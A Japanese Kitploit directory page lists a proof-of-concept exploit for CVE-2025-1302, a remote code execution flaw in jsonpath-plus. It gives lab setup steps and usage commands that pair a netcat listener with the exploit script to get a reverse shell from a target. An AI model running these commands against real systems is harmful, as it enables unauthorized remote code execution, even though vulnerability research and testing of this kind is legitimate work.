Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-1302 — JSONPath-plus のリモートコード実行 | Kitploit
ツール/GitHubGitHub/eqstlab/cve-2025-1302
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用学習と教育ラボと実践
GitHubeqstlab/cve-2025-1302

CVE-2025-1302

JSONPath-plus のリモートコード実行

リポジトリを見る
2011年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-1302

★ CVE-2025-1302 JSONPath-plus RCE PoC ★

https://github.com/user-attachments/assets/5d791540-ef6c-4cd0-bd25-7a1dbbd194fb

ラボのセットアップ

root@kitploit:~
docker build -t jsonpath:10.2.0 .
docker run --rm --name jsonpath -p 3000:3000 jsonpath:10.2.0

localhost:3000 image

説明

jsonpath-plus パッケージの 10.3.0 より前のバージョンは、不適切な入力サニタイズにより、リモートコード実行(RCE)の脆弱性があります。攻撃者は、eval='safe' モードの安全でない既定の使用法を悪用して、システム上で任意のコードを実行できます。注: これは、CVE-2024-21534 の不完全な修正が原因です。

使用方法

Git クローン

root@kitploit:~
git clone https://github.com/EQSTLab/CVE-2025-1302.git
cd CVE-2025-1302

パッケージのインストール

root@kitploit:~
pip install -r requirements.txt

コマンド

root@kitploit:~
nc -l -p <LPORT>
python3 CVE-2025-1302.py -u <URL_TO_EXPLOIT> -i <LHOST> -p <LPORT>

出力

image

結果

image

免責事項

このリポジトリは、CVE-2025-1302 の RCE エクスプロイトを意図したものではありません。このプロジェクトの目的は、この脆弱性について人々が学び、自身のアプリケーションをテストできるようにすることです。

EQST Insight

当社は毎月、CVE とマルウェアの分析情報を公開しています。ご興味があれば、以下のリンクから公開資料をご確認ください。 https://www.skshieldus.com/eng/business/insight.do

ツールをダウンロード